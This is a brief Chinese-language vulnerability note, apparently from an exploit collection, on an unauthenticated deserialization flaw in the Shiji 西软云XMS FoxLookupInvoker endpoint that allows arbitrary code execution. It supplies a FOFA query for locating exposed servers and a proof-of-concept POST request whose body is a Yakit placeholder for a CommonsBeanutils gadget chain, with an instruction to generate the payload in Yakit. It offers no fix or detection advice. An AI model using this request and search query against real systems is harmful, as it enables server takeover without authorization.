24 lines
789 B
Markdown
24 lines
789 B
Markdown
## 西软云XMS反序列化漏洞
|
||
|
||
西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,未经身份认证的攻击者可利用此漏洞执行任意代码,获取服务器权限。
|
||
|
||
## fofa
|
||
```
|
||
app="shiji-西软云XMS"
|
||
```
|
||
|
||
## poc
|
||
```
|
||
POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1
|
||
Host:
|
||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
|
||
Connection: close
|
||
|
||
{{hexdec(cb18x的序列化链)}
|
||
```
|
||
使用yakit 生成payload
|
||
|
||
|
||
|
||
|